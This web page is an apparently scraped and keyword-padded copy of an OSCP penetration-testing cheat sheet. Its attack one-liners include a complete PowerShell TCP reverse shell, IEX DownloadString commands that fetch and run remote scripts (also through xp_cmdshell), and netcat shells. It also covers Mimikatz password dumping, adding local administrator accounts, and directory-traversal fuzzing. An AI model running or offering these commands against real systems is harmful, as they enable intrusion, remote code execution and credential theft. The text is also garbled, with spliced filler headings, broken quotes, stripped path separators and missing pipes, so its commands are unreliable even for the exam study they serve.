Pentestmonkey Reverse Shell Cheat Sheet



Reverse Shell Cheat Sheet. You can find them all around the internet. I couldn't find them all in one place, so I write them down here. Don't hesitate to tell me if you find some more and I will add them to this list. The very good Pentestmonkey php reverse shell. OSCP Cheatsheet Reverse Shell One Liners. OSCP Labs, Red Teaming, CTF’s or Real Penetration Tests are full of challenges where our goal is or maybe to compromise a particular target. We are not always lucky to get a complete GUI or Interactive access to remote system. In most of the scenarios we compromise the target machine using system level mis-configurations, vulnerable services, kernel.

Forked from sinfulz “JustTryHarder” is his “cheat sheet which will aid you through the PWK course & the OSCP Exam.”
So here:“

JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Disclaimer: none of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info:I have obtained a lot of this info through other Github repos, blogs, sites and more.I have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz

Active Directory & Domain Controllers

  • WIP

BOF (WIP)

(Bad Characters: 0x00, 0x0A)

  • Fuzzing
  • Finding eip position
  • Finding bad chars
  • Locating jmp esp
  • Generating payload with msfvenom
  • Getting reverse shell with netcat

DNS - Zone Transfers

  • host -t axfr HTB.local 10.10.10.10
  • host -l HTB.local 10.10.10.10
  • host -l
  • dig @
  • churrasco -d “net localgroup administrators /add'
  • churrasco -d “NET LOCALGROUP “Remote Desktop Users” /ADD'

Post Exploitation

Pentestmonkey net
  1. Mimikatz.exe (run it)
  2. privilege::debug
  3. sekurlsa::logonpasswords

Port Forwarding

#Chisel

#Plink

#SSH

  • ssh root@10.10.10.10 -R 1234:127.0.0.1:1234

Port Scanning

#TCP

  • reconnoitre -t 10.10.10.10 -o . –services –quick –hostnames
  • nmap -vvv -sC -sV -p- –min-rate 2000 10.10.10.10
  • nmap -sT -p 22,80,110 -A
  • nmap -p- -iL ips.txt > TCP_Ports.txt

#UDP (can take hours so maybe netstat is a better alternative)

  • nmap -sU –top-ports 10000
  • nmap -sT -sU -p 22,80,110 -A
  • nmap -sT -sU -p- –min-rate 2000
  • nmap -p- -sU -iL ips.txt > udp.txt
  • nmap -sU -sV -iL ips.txt > alludpports.txt

#SNMPnmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)

#SSHnmap –script ssh2-enum-algos -iL ips.txt > SSH.txt

#SSLnmap -v -v –script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

PowerShell

  • powershell -ExecutionPolicy ByPass -File script.ps1

Pivoting

  • sshuttle -r user@10.10.10.10 10.1.1.0/24

Remote Desktop

rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/

Reverse Shells

#Linux

  • http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  • https://awansec.com/reverse-shell.html

#Windows

  • https://github.com/Dhayalanb/windows-php-reverse-shell
  • nc [YourIPaddr] [port] –e cmd.exe

Shell Upgrading

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

SQL Injection (SQLmap)

  • sqlmap -u “http://example.com/test.php?test=test” –level=5 –risk=3 –batch

Python

  1. python -c ‘import pty;spawn(“/bin/bash”);’or
  2. python3 -c ‘import pty;spawn(“/bin/bash”);’
  3. In reverse shell:```python -c ‘import pty; pty.spawn(“/bin/bash”)’Ctrl-Z
  • In Kali
  1. stty raw -echo
  2. fg
  • In reverse shell
    1. reset (sometimes optional)
    2. export SHELL=bash
    3. export TERM=xterm-256color
    4. stty rows columns (optional)(Sometimes the command will need to be executed: export TERM=xterm)```

Pentest Monkey Reverse Shell Cheat Sheet

Using socat

Perl

  1. perl -e ‘exec “/bin/sh”;’
  2. perl: exec “/bin/sh”;

Bash

/bin/sh -i

Show listening ports

  • Linux netstat syntax
    1. netstat -tulpngrep LISTEN
  • FreeBSD/MacOS X netstat syntax
    1. netstat -anp tcpgrep LISTEN
    2. netstat -anp udpgrep LISTEN
  • OpenBSD netstat syntax

    1. netstat -na -f inetgrep LISTEN
    2. netstat -natgrep LISTEN
  • Nmap scan syntax
    1. sudo nmap -sT -O localhost
    2. sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
    3. sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##

SMB - Enumeration

  • https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
  • smbmap -H 10.10.10.10
  • smbclient -L 10.0.0.10
  • smbclient //10.10.10.10/share$

SMB - Impacket

  • Impacket’s PSEXEC (After creating a remote port fwd)/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10

Password: (password)

[*] Trying protocol 445/SMB…

  • Impacket’s SMBServer (For File Transfer)
    1. cd /usr/share/windows-binaries
    2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
    3. 10.10.10.10amimikatz.exe

SMTP Enumeration

https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt

VMware (not going full screen)

  • systemctl restart open-vm-tools.service

Web Servers:

  • python -m SimpleHTTPServer 80
  • python3 -m http.server 80
  • ngrok http 80

Web Scanning:

#Web Scanning with extensions

#HTTP

  • gobuster dir -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69
  • gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69

#HTTPS

  • gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69(in some cases –wildcard will need to be used instead of -k)

#Nikto

  • nikto -h 10.10.10.10 -p 80

#Nikto HTTPS

  • nikto -h 10.10.10.10. -p 443

WFuzz

  • wfuzz -u http://google.com/login.php?username=admin&password=FUZZ -w /usr/share/wordlists/rockyou.txt
  • wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt

Web Shells

  • https://github.com/Arrexel/phpbash
  • https://github.com/flozz/p0wny-shell

WordPress

  • https://forum.top-hat-sec.com/index.php?topic=5758.0

Windows Framework / Powershell

bypass PowerShell execution policy```PowerShell -Exec Bypass

powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.1.3.40’,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

echo IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’) | powershell -noprofile -

Pentestmonkey Reverse Shell Cheat Sheet

IEX(New-object Net.WebClient).DownloadString(‘http://10.10.10.10:80/PowerUp.ps1’)

powershell -nop -exec bypass IEX “(New-Object Net.WebClient).DownloadString(‘http://10.10.14.x/Whatever.ps1’); Invoke-Whatever”

xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring('http://10.10.10.10/Nishang-ReverseShell.ps1')```Windows Post Exploitation Commands—————-

  • WMIC USERACCOUNT LIST BRIEF
  • net user
  • net localgroup Users
  • net localgroup Administrators
  • net user USERNAME NEWPASS /add
  • net user “USER NAME” NEWPASS /add
  • net localgroup administrators USERNAME /add

Writeable Directories(Work in progress)—————-

  • C:WindowsSystem32SpoolDriverscolor
  • C:windowstracing
  • C:windowstasks
  • C:windowssystem32microsoftcryptorsamachinekeys
  • To find World Writeable Directories in Linux use the command:find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print

Pentestmonkey Reverse Shell Cheat Sheet Online